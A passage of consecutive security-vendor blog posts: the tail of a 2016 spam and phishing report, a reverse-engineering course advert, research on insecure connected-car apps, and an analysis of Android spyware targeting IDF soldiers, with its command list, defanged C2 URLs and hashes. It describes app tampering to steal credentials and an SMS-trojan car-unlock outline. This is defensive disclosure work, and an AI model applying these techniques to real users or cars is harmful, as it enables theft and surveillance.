    Eighth place was taken by the Trojan.Java.Agent family. The malicious programs of this family are written in Java and have the JAR extension. These applications exploit vulnerabilities in Sun Java Runtime and can delete, block, modify or copy data, as well as download and run other malware.

    Ninth place was occupied by Backdoor.Win32.Androm. This malware belongs to the family of Andromeda/Gamarue universal modular bots. Key features of these bots include the ability to download, store and run a malicious executable file, download and boot a malicious DLL (without saving it to disk), and update and delete itself. The bot functionality is extended with the help of plugins that can be uploaded by the intruders at any time.

    Completing the Top 10 is the Worm.Win32.WBVB family. It includes executable files written in Visual Basic 6 (both in P-code and Native mode) that are not trusted by KSN.

    Countries targeted by malicious mailshots

    Distribution of email antivirus verdicts by country, 2016

    In 2016, Germany (14.13%) remained in first place, despite a decrease of 4.93 p.p. Second and third were occupied by countries from the Asia-Pacific region – Japan (7.59%) and China (7.32%) – that were both outside the Top 10 in 2015.

    Russia (5.6%), which was third in the previous year’s rating, came fourth in 2016 after the proportion of email antivirus detections in the country decreased by 0.7 p.p. It was followed by Italy (5.44%), the UK (5.17%) and Brazil (4.99%), which also dropped out of the top three.

    The US came eighth, accounting for 4.03% of email antivirus detections, 0.89 p.p. less than the previous year.

    Austria (2.35%) rounded off the Top 10 with an increase of 0.93 p.p.

    Phishing

    In 2016, the Anti-Phishing system was triggered 154,957,897 times on the computers of Kaspersky Lab users. That is 6,562,451 more times than in 2015. Overall, 15.29% of our users were targeted by phishers.

    Hot topics of the year

    Phishers, predictably, could not pass up the most high-profile event of the year – the Olympic Games in Brazil. The scammers targeted both the organizers of the Olympic Games and ordinary netizens who received fake notifications of lottery wins, allegedly organized by the Brazilian government and the Olympic Committee.

    The US presidential elections were also seen as a good media event for phishers. This theme was exploited to mislead internet users not only in the US but also in other countries.

    Yet another interesting theme that became the subject of a dedicated study was holiday season sales. Scammers took advantage of the busy shopping period in the run-up to the festive season by creating fake websites of payment systems and online stores and luring potential victims by promising generous discounts.

    A fake online store page

    In addition, the holiday season itself often becomes an excellent cover for the fraudsters. For example, they may ask users to update their account information prior to the New Year.

    Phishing page exploiting the New Year theme in the subdomain name

    Methods of distributing phishing content

    In 2016, cybercriminals used all possible means to reach users and make them pass on confidential information or money: social networks, pop-up ads, banners, text messages.

    Among the most interesting methods were scams involving services for buying and selling used items. Cybercriminals collected phone numbers from ads placed on these services and then sent text messages to the numbers offering something in exchange at an extra cost. The message contained a link allegedly leading to a photo of the item on offer, but which actually led the victim to a phishing page.

    Fraudsters often exploit social networks, and it is not restricted to personal messages. In 2016, many Facebook users around the world, for instance, were prompted to install a malicious extension for their browser, when they were added to a post containing a phishing link that supposedly led to a provocative video.

    In Europe, the most widespread malicious extension was ‘xic. graphics’. It was soon removed from an online store, but according to the available whois information, over 50 other domains were registered in the name of the owners of the domain that hosted the fake page. Those domains were probably used for similar purposes.

    Phisher tricks: referrer cleaner services

    In Q4 2016, scammers showed a tendency to use referrer cleaner services. The victim was sent an email on behalf of a well-known company containing a link whose parameters included the address of the victim.

    After clicking the URL, the user is taken to a page that shows a 302 error and then redirects the user to the address of a referrer cleaner service, which in turn redirects them to the legitimate website of a bank.

    http://nullrefer.com/?https://www.cartalis.it/cartalis/prepagata/index.jsp

    This way the user does not know that they have received a phishing email, while the bank does not receive a phishing domain in its referrers. At the same time, the phishers get confirmation that the user clicked on the link, which means that in future they will be able to send them more phishing emails, for example, in order to steal credit card data. In this way, the attackers ‘cleanse’ their databases of unused email addresses and vigilant recipients. They also detect clients of the bank whose name was used in the emails, allowing them to make their mass mailings more targeted.

    The geography of attacks Top 10 countries by percentage of attacked users

    Brazil had the highest proportion of users subjected to phishing attacks (27.61%), a 5.98 p.p. increase on the previous year.

    The percentage of users on whose computers the Anti-Phishing system was triggered out of the total number of Kaspersky Lab users in the country, 2016

    In Brazil, we see lots of attacks targeting users of banks and online stores, so it is not surprising that the country often leads in the rating of countries with the highest proportion of users subjected to phishing attacks.

    Phishers often place fake pages on the servers of government bodies in Brazil. This is one of the methods used to prevent phishing URLs from ending up on blacklists. It also enhances the credibility in the eyes of the victim. In 2016, we registered 1,043 such cases.

    Fake page on the gov.br domain

    Top 10 countries by percentage of attacked users

    Country % Brazil 27.61 China 22.84 Australia 20.07 Japan 19.16 Algeria 17.82 Russia 17.16 United Kingdom 16.64 Canada 16.03 United Arab Emirates 15.54 Saudi Arabia 15.39

    China was second in this rating (22.84%). It didn’t make the Top 10 in 2015, but added 5.87 p.p. to its share in 2016. Australia (20.07%), which was seventh last year, came third following an increase of 2.39 p.p. Apart from Saudi Arabia (+ 4.9 p.p.), the shares of the other Top 10 countries barely changed.

    The distribution of attacks by country

    Russia (16.12%, +1.68 p.p.) topped the rating of countries where the Anti-Phishing system was trigged most often (out of the total number of the Anti-Phishing system detections around the world in 2016)

    Distribution of Anti-Phishing system component detections by country, 2016

    As in 2015, Brazil (8.77%) came second behind Russia, although its growth was negligible. The US added 0.5 p.p. (8.01%), which was enough to push India (6.01%) down to fourth. The top five also included China (7.86%).

    Organizations under attack

    The statistics on organizations used in phishing attacks are based on the triggering of the heuristic component in the Anti-Phishing system. The heuristic component is triggered when a user tries to follow a link to a phishing page and there is no information about the page in Kaspersky Lab’s databases.

    Organizations under attack by category

    In the second half of 2016, the proportion of phishing attacks targeting customers of financial institutions increased significantly (44.16% in the first quarter vs 48.14% in Q4). We have been following this growth over the last few years: in 2014, the average figure for the year was 28.74%; in 2015, it was 34.33%; and it was 47.47% in 2016.

    In 2016, we saw significant growth in the proportion of phishing attacks on organizations belonging to the ‘Banks’ category (25.76%, + 8.31 p.p.). Of particular note was the increase in the percentage of targeted organizations in the ‘Online stores’ (10.17%, +1.09 p.p.) and ‘Payment systems’ (11.55%, +3.75 p.p.) categories.

    Distribution of organizations subject to phishing attacks by category, 2016

    At the same time, the share of the main categories decreased. For instance, the ‘Global Internet portals’ category (24.10%) lost 7.77 p.p. while the share of ‘Social networking sites’ (10.91%) fell by 5.49 p.p.

    Overall, the priorities of the phishing scammers have not changed over the years. Attacks primarily exploit the names of popular brands, whose clients are numerous and likely to bring maximum financial profit.

    Another priority is attacks that could lead to the acquisition of confidential information and, subsequently, money. For example, some portals from the ‘Global Internet portals’ category (Google, Yahoo!, Microsoft (live.com), etc.) use the same account to access multiple services. A successful phishing campaign can therefore give fraudsters access to several of the victim’s accounts.

    Phishing page to attack Google users

    Top 3 attacked organizations

    Organization % of detected phishing links Yahoo! 7.84 Facebook 7.13 Microsoft Corporation 6.98

    Yahoo! (7.84%) again topped the ranking of organizations used by fraudsters to mask their attacks, although the proportion of Anti-Phishing system detections of fake pages mentioning this brand declined considerably in 2016 – by 6.86 p.p. (vs 10 p.p. in 2015). It is clear that the company is actively fighting phishing attacks, for example, by registering obfuscated domains in its own name (yshoogames.com, ypyahoo.com.cn, yhoonews.com, yhoooo.com, yayoo.com, yahou.com). However, phishers often place their content on legitimate sites (without the owners being aware of it) rather than create phishing domains.

    Example of a web page using the Yahoo! brand

    Second in popularity with the fraudsters was Facebook (7.13%). Over the year its share decreased by 2.38 p.p.

    In 2016, we came across both classic phishing pages imitating the Facebook login page and various pages designed to steal data. One popular way of luring a victim is to promise them access to age-restricted content after entering their username and password, i.e., logging in to the system.

    To increase the chances of hitting their target, mass phishing campaigns use the names of the most popular brands. Since these brands are often international, the attacks target users around the world. Naturally, phishing messages are written in many languages. One phisher trick was described in our report Spam and phishing in Q3 2016. By using information about the IP address of a potential victim, phishers determine the country in which they are located. Cybercriminals will then display pages in the language of the country that is identified.

    Third place in our Top 3 was occupied by Microsoft (6.98%). Using this brand to hide their attacks, fraudsters often try to steal data from user accounts on the live.com portal. They tend to use pages imitating the login page of the company’s email service.

    There are also other schemes, such as simulation of account verification:

    Conclusions and forecasts

    2016 saw a variety of changes in spam flows, with the increase in the number of malicious mass mailings containing ransomware being the most significant. These programs are readily available on the black market, and in 2017 the volume of malicious spam is unlikely to fall.

    Spam became very popular with small and medium businesses in China in 2016. One possible reason for this is the Great Firewall of China, which makes it difficult for Chinese businesses to use legal international platforms for advertising.

    Of all the techniques used by spammers in 2016, the various ways of adding noise to text and links with the help of HTML capabilities are worth noting. This is nothing new, but spammers are constantly coming up with new types of obfuscation, and they will obviously continue to do so in the future.

    The proportion of spam in email traffic was 58.31%, which is 3.03 p.p. higher than 2015. This was the first registered growth since 2009 – this was partially down to the surge in malicious spam.

    For several years in a row, the number of fraudulent schemes targeting clients of financial institutions has been increasing, and we expect this trend to continue. The attacks are becoming more versatile: the fraudulent pages adapt to the user and display information in the local language as well as other relevant data.

    The methods for distributing fraudulent pages have gone far beyond the scope of email. Cybercriminals are using all available means to contact potential victims: text messages, advertising or social networks. The latter are not only a good channel of communication but also a useful resource helping intruders gather information to carry out a more effective attack on users.

Dissecting Malware

Fri, 02/17/2017 - 04:55

Four-day course on reverse engineering

There are just a handful of reverse engineers clustered at the very top of the information security profession. From March 30 through April 2, 2017, one of them — Principal Security Researcher at Kaspersky Lab Nicolas Brulez — will deliver a course on the subject he has been training people around the world on for 12 years, malware reverse engineering. You won’t be stumped for days on end by reversing challenges anymore, because you’ll take away from St. Maarten tricks and efficient moves to reverse faster.

At Kaspersky Lab’s SAS 2017, those who are trying to break into the next level of digital investigation and malware analysis will benefit greatly — the SAS team has prepared three dedicated courses. Students will find out how to hunt for rare samples, study link analysis to see hidden connections, and learn reverse engineering techniques to see how the malicious code actually works.

You can take advantage of these “surgical” studies if you’re a practitioner of malware research, do forensics or incident response, or deal with reversing in general. You need to know assembly language and how to use tools such as debuggers and disassemblers (IDA). If you were analyzing code 10 years ago, you’ll find it easy to jump back into reversing. The good thing about it is that the tools and techniques remain almost the same, so reverse engineers just have to adapt a little bit to new technologies. Join the training to make sure that the world hasn’t turn upside down while you were chilling.

Journey to the inside of famous malware

Each day the students will practice reverse engineering skills on samples from such malicious programs as Cloud Atlas, MiniDuke or Red October that can be applied to modern analysis. The course program will help you develop the following skills:

Unpacking malware manually

Packers have been around for more than 10 years. In all this time they have had just one aim: making malware analysis more difficult and time-consuming. As it is time which is crucially important for a researcher, unpacking samples quickly is the goal of Day 1 of the training. Be ready to unpack some of the “celebrities” of the malware universe.

Actual malware analysis

After Day 2 you will be able to perform static shell code analysis using IDA as if you had never stopped doing it. You quickly take code from one sample hashing algorithm and easily re-implement it. Other exercises are included too, such as analyzing MiniDuke, which is written in machine assembly language and has an extremely small and unsuspicious file size.

Dissecting APTs

The last two days gives you the chance to practice what you learned in the first two days. You will define the components of malware and observe its functions, investigating the way it communicates with C&C servers. Only an understanding of how malware works will allow an IT security expert to stop the infection.

Hardware requirements
  • Legitimate version of IDA Pro
  • Virtual Machine with Windows XP SP3 installed (to avoid compatibility issues)
  • OllyDbg
  • Python 2.7
  • PE Editor (e.g. LordPE or other)
  • Hex Editor (e.g. Hiew or other)
  • Import Reconstructor/fixer: Imprec, Universal Import Fixer 1.2
  • PEID

The class is limited to a maximum of 20 participants — so book a seat at sas.kaspersky.com to be sure you are on the list.

Mobile apps and stealing a connected car

Thu, 02/16/2017 - 17:27

The concept of a connected car, or a car equipped with Internet access, has been gaining popularity for the last several years. The case in point is not only multimedia systems (music, maps, and films are available on-board in modern luxury cars) but also car key systems in both literal and figurative senses. By using proprietary mobile apps, it is possible to get the GPS coordinates of a car, trace its route, open its doors, start its engine, and turn on its auxiliary devices. On the one hand, these are absolutely useful features used by millions of people, but on the other hand, if a car thief were to gain access to the mobile device that belongs to a victim that has the app installed, then would car theft not become a mere trifle?

In pursuing the answer to this question, we decided to figure out what an evildoer can do and how car owners can avoid possible predicaments related to this issue.

Potential Threats

It should be noted that car-controlling apps are quite popular – most popular brands release apps whose number of users is between several tens of thousands and several million people. As an example, below are several apps listed with their total number of installations.

For our experiments, we took several apps that control cars from various manufacturers. We will not disclose the app titles, but we should note that we notified the manufacturers of our findings throughout our research.

We reviewed the following aspects of each app:

  • Availability of potentially dangerous features, which basically means whether it is possible to steal a car or incapacitate one of its systems by using the app;
  • Whether the developers of an app employed means to complicate reverse engineering of the app (obfuscation or packing). If not, then it won’t be hard for an evildoer to read the app code, find its vulnerabilities, and take advantage of them to get through to the car’s infrastructure;
  • Whether the app checks for root permissions on the device (including subsequent canceled installations in case the permissions have been enabled). After all, if malware manages to infect a rooted device, then the malware will be capable of doing virtually anything. In this case, it is important to find out if developers programmed user credentials to be saved on the device as plain text;
  • Whether there is verification that it is the GUI of the app that is displayed to the user (overlay protection). Android allows for monitoring of which app is displayed to the user, and a malware can intercept this event by showing a phishing window with an identical GUI to the user and steal, for instance, the user’s credentials;
  • Availability of an integrity check in the app, i.e., whether it verifies itself for changes within its code or not. This affects, for example, the ability of a malefactor to inject his code into the app and then publish it in the app store, keeping the same functionality and features of the original app.

Unfortunately, all of the apps turned out to be vulnerable to attacks in one way or another.

Testing the Car Apps

For this study, we took seven of the most popular apps from well-known brands and tested the apps for vulnerabilities that can be used by malefactors to gain access to a car’s infrastructure.

The results of the test are shown in the summary table below. Additionally, we reviewed the security features of each of the apps.

App App features App code obfuscation Unencrypted username and password Overlay protection for app window Detection of root permissions App integrity check App #1 Door unlock No Yes (login) No No No App #2 Door unlock No Yes (login & password) No No No App #3 Door unlock; engine start No – No No No App #4 Door unlock No Yes (login) No No No App #5 Door unlock; engine start No Yes (login) No No No App #6 Door unlock; engine start No Yes (login) No No No App #7 Door unlock; engine start No Yes (login & password) No No No App #1

The whole car registration process boils down to entering a user login and password as well as the car’s VIN into the app. Afterwards, the app shows a PIN that has to be entered with conventional methods inside the car so as to finalize the procedure of linking the smartphone to the car. This means that knowing the VIN is not enough to unlock the doors of the car.

The app does not check if the device is rooted and stores the username for the service along with the VIN of the car in the accounts.xml file as plain text. If a Trojan has superuser access on the linked smartphone, then stealing the data will be quite easy.

App #1 can be easily decompiled, and the code can be read and understood. Besides that, it does not counter the overlapping of its own GUI, which means that a username and password can be obtained by a phishing app whose code may have only 50 lines. It should be enough to check which app is currently running and launch a malicious Activity with a similar GUI if the app has a target package name.

In order to check for integrity verification, we modified the loginWithCredentials method.

In this case, a username and password will simply be shown on the screen of a smartphone, but nothing prevents embedding a code to send credentials to a criminal’s server.

The absence of integrity verification allows any interested individual to take the app, modify it at his own discretion, and begin distributing it among potential victims. Signature verification is sorely lacking. There is no doubt that such an attack will require an evildoer to make some effort – a user has to be conned into downloading the modified version of the app. Despite that, the attack is quite surreptitious in nature, so the user will not notice anything out of the ordinary until his car has been stolen.

What is nice, however, is that the app pulls SSL certificates to create a connection. All in all, this is reasonable enough, as this prevents man-in-the-middle attacks.

App #2

The app offers to save user credentials but at the same time recommends encrypting the whole device as a precaution against theft. This is fair enough, but we are not going to steal the phone – we are just “infecting” it. As a result, there is the same trouble as found in App #1: the username and password are stored as plain text in the prefs file.{?????????}.xml file (the question marks represent random characters generated by the app).

The VIN is stored in the next file.

The farther we go, the more we get. The developers did not even find time to implement integrity verification of the app code, and, for some reason, they also forgot about obfuscation. As a consequence of that, we easily managed to modify the LoginActivity code.

Thus, the app preserved its own functionality. However, the username and password that had been entered during registration were displayed on the screen immediately after a login attempt.

App #3

Cars paired to this app are optionally supplied with a control module that can start the engine and unlock the doors. Every module installed by the dealer has a sticker with an access code, which is handed over to the car owner. This is why it is not possible to link the car to other credentials, even if its VIN is known.

Still, there are other attack possibilities: first, the app is tiny, as its APK size amounts to 180 kilobytes; secondly, the entire app logs its debugging data onto a file, which is saved on an SD card.

Logging at the start of LoginActivity

The location for dumping the log file

It’s a bit of bad luck that logging is enabled only when the following flag is set up in the app: android:debuggable=”true”. The public version of the app does not have the flag for obvious reasons, but nothing can stop us from inserting it into the app. To do that, we shall use the Apktool utility. After launching the edited app and attempting to log in, the SD card of the device will create a marcsApp folder with a TXT file. In our case, the username and password of the account have been output into the file.

Of course, persuading the victim to remove the original app and install an identical one with the debugging flag is not that easy. Nevertheless, this shuffling can be performed, for example, by luring the victim to a website where the edited app and installation manual can be downloaded as a critical update. Empirically, virus writers are good at employing social engineering methods such as this one. Now, it isn’t a big deal to add to the app the ability to send a log file to a designated server or a phone number as an SMS message.

App #4

The app allows binding of the existing VIN to any credentials, but the service will certainly send a request to the in-dash computer of the car. Therefore, unsophisticated VIN theft will not be conducive to hacking the car.

However, the tested app is defenseless against overlays on its window. If, owing to that, an evildoer obtains the username and password for the system, then he will be able to unlock the doors of the car.

Regretfully enough, the app stores the username for the system as well as a plethora of other interesting data, such as the car’s make, the VIN, and the car’s number, as clear text. All of these are located in the MyCachingStrategy.xml file.

App #5

In order to link a car to a smartphone that has the app installed, it is necessary to know the PIN that will be displayed by the in-dash computer of the car. This means that, just like in the case with the previous app, knowing the VIN is not enough; the car must be accessed from the inside.

App #6

This is an app made by Russian developers, which is conceptually different from its counterparts in that the car owner’s phone number is used as authorization. This approach creates a fair degree of risk for any car owner: to initiate an attack, just one Android API function has to be executed to gain possession of the username for the system.

App #7

For the last app that we reviewed, it must be noted that the username and password are stored as plain text in the credentials.xml file.

If a smartphone is successfully infected with a Trojan that has superuser permissions, then nothing will hinder the effortless theft of this file.

Opportunities for Car Theft

Theoretically, after stealing credentials, an evildoer will be able to gain control of the car, but this does not mean that the criminal is capable of simply driving off with it. The thing is, a key is needed for a car in order for it to start moving. Therefore, after accessing the inside of a car, car thieves use a programming unit to write a new key into the car’s on-board system. Now, let us recall that almost all of the described apps allow for the doors to be unlocked, that is, deactivation of the car’s alarm system. Thus, an evildoer can covertly and quickly perform all of the actions in order to steal a car without breaking or drilling anything.

Also, the risks should not be limited to mere car theft. Accessing the car and deliberate tampering with its elements may lead to road accidents, injuries, or death.

None of the reviewed apps have defense mechanisms. Due credit should be given to the app developers though: it is a very good thing that not a single of the aforementioned cases uses voice or SMS channels to control a car. Nonetheless, these exact methods are used by aftermarket alarm-system manufacturers, including Russian ones. On the one hand, this fact does not come as a surprise, as the quality of the mobile Internet does not always allow cars to stay connected everywhere, while voice calls and SMS messages are always available, since they are basic functions. On the other hand, this creates supernumerary car security threats, which we will now review.

Voice control is handled with so-called DTMF commands. The owner literally has to call up the car, and the alarm system responds to the incoming call with a pleasant female voice, reports the car status, and then switches to standby mode, where the system waits for commands from the owner. Then, it is enough to dial preset numbers on the keypad of the phone to command the car to unlock the doors and start the engine. The alarm system recognizes those codes and executes the proper command.

Developers of such systems have taken care of security by providing a whitelist for phone numbers that have permission to control the car. However, nobody imagined a situation where the phone of the owner is compromised. This means that it is enough for a malefactor to infect the smartphone of a victim with an unsophisticated app that calls up the alarm system on behalf of the victim. If the speakers and screen are disabled at the same time, then it is possible to take full command of the car, unbeknownst to the victim.

Certainly though, not everything is as simple as it seems at first glance. For example, many car enthusiasts save the alarm-system number under a made-up name, i.e. a successful attack necessitates frequent interaction of the victim with the car via calls. Only this way can an evildoer that has stolen the history of outgoing calls find the car number in the victim’s contacts.

The developers of another control method for the car alarm system certainly have read none of our articles on the security of Android devices, as the car is operated through SMS commands. The thing is, the first and most common mobile Trojans that Kaspersky Lab faced were SMS Trojans, or malware that contains code for sending SMS surreptitiously, which was done through common Trojan operation as well as by a remote command issued by malefactors. As a result, the doors of a victim’s car can be unlocked if malware developers perform the following three steps:

  1. Go through all of the SMS messages on the smartphone to look for car commands.
  2. If the needed SMS messages have been located, then extract the phone number and password from them in order to gain access.
  3. Send an SMS message to the discovered number that unlocks the car’s doors.

All of these three steps can be done by a Trojan while its victim suspects nothing. The only thing that needs to be done, which malefactors are certainly capable of handling, is to infect the smartphone.

Conclusion

Being an expensive thing, a car requires an approach to security that is no less meticulous than that of a bank account. The attitude of car manufacturers and developers is clear: they strive to fill the market quickly with apps that have new features to provide quality-of-life changes to car owners. Yet, when thinking about the security of a connected car, its infrastructure safety (for control servers) and its interaction and infrastructure channels are not the only things worth considering. It’s also worth it to pay attention to the client side, particularly to the app that is installed on user devices. It is too easy to turn the app against the car owner nowadays, and currently the client side is quite possibly the most vulnerable spot that can be targeted by malefactors.

At this point, it should be noted that we have not witnessed a single attack on an app that controls cars, and none of the thousands of instances of our malware detection contain a code for downloading the configuration files of such apps. However, contemporary Trojans are quite flexible: if one of these Trojans shows a persistent ad today (which cannot be removed by the user himself), then tomorrow it can upload a configuration file from a car app to a command-and-control server at the request of criminals. The Trojan could also delete the configuration file and override it with a modified one. As soon as all of this becomes financially viable for evildoers, new capabilities will soon arrive for even the most common mobile Trojans.

Breaking The Weakest Link Of The Strongest Chain

Thu, 02/16/2017 - 04:54

Around July last year, more than a 100 Israeli servicemen were hit by a cunning threat actor. The attack compromised their devices and exfiltrated data to the attackers’ command and control server. In addition, the compromised devices were pushed Trojan updates, which allowed the attackers to extend their capabilities. The operation remains active at the time of writing this post, with attacks reported as recently as February 2017.

The campaign, which experts believe is still in its early stages, targets Android OS devices. Once the device is compromised, a process of sophisticated intelligence gathering starts, exploiting the ability to access the phone’s video and audio capabilities, SMS functions and location.

The campaign relies heavily on social engineering techniques, leveraging social networks to lure targeted soldiers into both sharing confidential information and downloading the malicious applications.

Characterized by relatively unsophisticated technical merit, and extensive use of social engineering, the threat actor targets only IDF soldiers.

IDF C4I & the IDF Information Security Department unit, with Kaspersky Lab researchers, have obtained a list of the victims; among them IDF servicemen of different ranks, most of them serving around the Gaza strip.

Attack Flow

The operation follows the same infection flow across the different victims:

Figure 1: Campaign’s attack flow

Social Engineering

The threat actor uses social engineering to lure targets into installing a malicious application, while continuously attempting to acquire confidential information using social networks. We’ve seen a lot of the group’s activity on Facebook Messenger. Most of the avatars (virtual participants in the social engineering stage) lure the victims using sexual innuendo, e.g. asking the victim to send explicit photos, and in return sending fake photos of teenage girls. The avatars pretend to be from different countries such as Canada, Germany, Switzerland and more.

Dropper

After the victim downloads the APK file from the malicious URL, the attacker expects the victim to install the package manually. The dropper requires common user permissions as shown in the following screenshot.

Figure 2: Dropper permissions once installed on a victim mobile device

Key features

The dropper relies on the configuration server which uses queries in order to download the best fitting payload for the specified device.

  • Downloader & Watchdog of the main payload
  • Payload update mechanism
  • Customized payload – the dropper sends a list of installed apps, and receives a payload package based on it
  • Obfuscation – The dropper package is obfuscated using ProGuard, which is an open source code obfuscator and Java optimizer, observed in the LoveSongs dropper.
Network Protocols

The network protocol between the dropper and the configuration server is based on HTTP POST requests. The following servers implement a RESTful API:

LoveSongs – http://endpointup[.]com/update/upfolder/updatefun.php

YeeCall, WowoMessanger – http://droidback[.]com/pockemon/squirtle/functions.php

Figure 3: Communication with C&C server over HTTP

Most of the communication with the server is in clear-text, except for specific commands which are encrypted using an AES-128 hard coded-key.

Figure 4: WowoMessanger REST-API POST packet capture

Figure 5: Fake WowoMessanger app – logic flow

Along with an ID existence check, the dropper sends a list of the device’s installed apps – if it hasn’t done so already.

The flow between different variants of the dropper is similar, with minor changes. One variant pretends to be a YouTube player, while others are chat apps:

LoveSongs has YouTube player functionality, whereas WowoMessanger does not have any legitimate functionality whatsoever; it erases its icon after the first run.

Payload

The payload is installed after one of the droppers mentioned above has been downloaded and executed on the victim device. The only payload we have seen so far is “WhatsApp_Update”.

The payload is capable of two collection mechanisms:

  • Execute “On demand” commands – manual commands that are triggered by the operator
  • Scheduled process – scheduled tasks that collect information periodically from various sources.

Most of the collected data will be sent only when a WI-FI network is available.

C&C Commands

The payload uses the WebSocket protocol, which gives the attacker a real-time interface to send commands to the payload in a way that resembles ‘reverse shell’. Some of the commands are not yet implemented (as shown in the table below). The commands gives the operator basic yet dangerous RAT capabilities:

  • Collect general information about the device e.g. Network operator, GPS location, IMEI etc.
  • Open a browser and browse to a chosen URL
  • Read & send SMS messages, and access contacts
  • Eavesdrop at a specific time and period
  • Take pictures (using the camera) or screenshots
  • Record video and audio.
COLL_AUDIO_RECORDS COLL_CALL_RECORDS GET_LOCATION CHECK_AVAILABILITY OPEN_WEBPAGE GET_IMAGE GET_DEVICE_INFO COLL_CAPTURED_PHOTOS GET_TELEPHONY_INFO GET_CELLS_INFO TAKE_SCREENSHOT CALL_PHONE GET_SEC_GALL_CACHE GET_SMS SEND_SMS GET_CONTACTS GET_BOOKMARKS TAKE_BACK_PIC CHANGE_AUDIO_SOURCE RECORD_AUDIO GET_SEARCHES CLOSE_APP GET_HISTORY OPEN_APP GET_CALENDER_EVENTS RESTART GET_USER_DICTIONARY SHUTDOWN UNINSTALL_APP GET_ACCOUNTS INSTALL_APK GET_INSTALLED_APPS GET_WHATSAPP_KEY RECORD_FRONT_VIDEO GET_WHATSAPP_BACKUP GET_FILE GET_CALLS GET_ROOT_STATUS TAKE_FRONT_PIC RECORD_BACK_VIDEO INVALID_COMMAND REMOVE_FILE

*Commands which were implemented are in bold.

Scheduled Process

Besides the C&C commands, the payload periodically collects data using various Android APIs. The default time interval is 30 seconds. The process collects the following data:

  • General data about the device (as mentioned in the C&C command)
  • SMS messages, WhatsApp database along with the encryption key (requires root permissions which is not yet fully implemented)
  • Browsing & search history along with bookmarks
  • Documents and archives ( < 2MB ) found in storage (doc, docx, ppt, rar, etc)
  • Pictures taken, auto captures while on an active call
  • List of contacts and call logs
  • Records calls and eavesdrops
  • Updates itself

The attackers implemented all of the malicious logic without any native or third-party sources. The logic behind the automatic call-recording feature is implemented entirely using Android’s API.

Figure 6: Call-Recording implementation in WhatsApp_update

Conclusions

The IDF, which led the research along with Kaspersky Lab researchers, has concluded that this is only the opening shot of this operation. Further, that it is by definition a targeted attack against the Israeli Defense Force, aiming to exfiltrate data on how ground forces are spread, which tactics and equipment the IDF is using and real-time intelligence gathering.

Kaspersky Lab GReAT researchers will disclose more behind-the-scenes details of the operation at the upcoming Security Analyst Summit.

IOCs Domain names & APK hashes

androidbak[.]com
droidback[.]com
endpointup[.]com
siteanalysto[.]com
goodydaddy[.]com
10f27d243adb082ce0f842c7a4a3784b01f7248e
b8237782486a26d5397b75eeea7354a777bff63a
09c3af7b0a6957d5c7c80f67ab3b9cd8bef88813
9b923303f580c999f0fdc25cad600dd3550fe4e0
0b58c883efe44ff010fl703db00c9ff4645b59df
0a5dc47b06de545d8236d70efee801ca573115e7
782a0e5208c3d9e8942b928857a24183655e7470
5f71a8a50964dae688404ce8b3fbd83d6e36e5cd
03b404c8f4ead4aa3970b26eeeb268c594blbb47

Certificates – SHA1 fingerprints

10:EB:7D:03:2A:B9:15:32:8F:BF:68:37:C6:07:45:FB:DF:F1:87:A6
9E:52:71:F3:D2:1D:C3:22:28:CB:50:C7:33:05:E3:DE:01:EB:CB:03
44:52:E6:4C:97:4B:6D:6A:7C:40:AD:1E:E0:17:08:33:87:AA:09:09
67:43:9B:EE:39:81:F3:5E:10:33:C9:7A:D9:4F:3A:73:3B:B0:CF:0A
89:C8:E2:E3:4A:23:3C:A0:54:A0:4A:53:D6:56:C8:2D:4A:8D:80:56
B4:D5:0C:8B:73:CB:A9:06:8A:B3:F2:49:35:F8:58:FE:A2:3E:2E:3A

A look into the Russian-speaking ransomware ecosystem

Mon, 02/13/2017 - 19:41

It is no secret that encryption ransomware is one of the key malware problems today, for both consumers and corporate users. While analyzing the attack statistics for 2016, we discovered that by the end of the year a regular user was attacked with encryption ransomware on average every 10 seconds, with an organization somewhere in the world hit around every 40 seconds.

Kaspersky Lab statistics on the ransomware threat in 2016

In total we’ve registered attacks using encryption ransomware against 1,445,434 users worldwide. Between them, these people were attacked by 54 thousand modifications of 60+ families of crypto ransomware.

So why is this happening now if encryption ransomware, as a type of malware, has existed since the mid-2000s? There are three main reasons:

  • It’s easy to buy a ransomware build or builder on the underground market
  • It’s easy to buy a distribution service
  • Crypto ransomware, as a business, has a very clear monetization model through cryptocurrencies

In other words, this is a fine tuned, user friendly and constantly developing ecosystem. In the last few years we, at Kaspersky Lab, have been monitoring the development of this ecosystem. This is what we’ve learned.

1. In most cases crypto ransomware has a Russian origin

One of the findings of our research is that 47 of the 60+ crypto ransomware families we’ve discovered in the last 12 months are related to Russian-speaking groups or individuals. This conclusion is based on our observation of underground forums, command and control infrastructure, and other artefacts which can be found on the web. It is hard to draw strong conclusions on why so many of the ransomware families out there have a Russian origin, but it is safe to say that this is because there are a lot of well-educated and skilled code writers in Russia and its neighboring countries.

Another possible reason is that the Russian cybercriminal underground has the richest background when it comes to ransomware schemes. Prior to the current crypto ransomware wave, there was another ransomware-themed malware epidemic. Between approximately 2009 and 2011, thousands of users in Russia and its neighboring countries experienced attacks which used so-called Windows- or browser-lockers. This type of ransomware blocks the user’s access to their browser or OS and then demands a ransom in exchange for unlocking access. The epidemic withered for a number of reasons: law enforcement agencies responded adequately and caught several criminals involved in the business; mobile operators made the process of withdrawing money through premium SMS services harder; and the security industry invested a lot of resources into developing free unlocking services and technologies.

But it seems that experienced ransomware criminals haven’t disappeared, they’ve just been waiting for a new monetization model, which has now emerged in the form of crypto currencies. This time though, the ransomware problem is not specifically Russian, but global.

2. There are three types of involvement in the ransomware “business”

The Russian underground crypto ransomware market currently offers criminals three different ways of entering the illegal business.

  • Create new ransomware for sale
  • Become a partner in a ransomware affiliate program
  • Become the owner of an affiliate program

The first type of involvement requires advanced code writing skills, including a deep knowledge of cryptography. The actors which we have observed in this category are like gun traders: they usually don’t participate in actual attacks, but only sell code.

An example of an advertisement selling unique crypto malware, posted by its creator. The author promises encryption with Blowfish and RSA-2048 algorithms, anti-emulation techniques, advanced scanning capabilities, and functions allowing for the removal of backups and shadow copies of the information stored on the victim’s PC.

Sometimes, authors of the malware sell their “products” with all the source code for a fixed price (usually several thousand dollars) and sometimes they sell their builder – the tool which allows criminals with no programming background to build the crypto ransomware with a specific list of functions.

The following illustration provides hints as to what capabilities a builder gives to a criminal. For example, it allows criminals to create ransomware which will start encrypting files only after 10 minutes of user inactivity; which will change the extensions of encrypted files to one of the criminals’ choice; and which will request administrator privileges until it receives it. It also allows criminals to change desktop wallpapers to arbitrary ones, and to implement some other features that in the end can be combined into a very dangerous piece of software.

The interface of the Glove ransomware builder

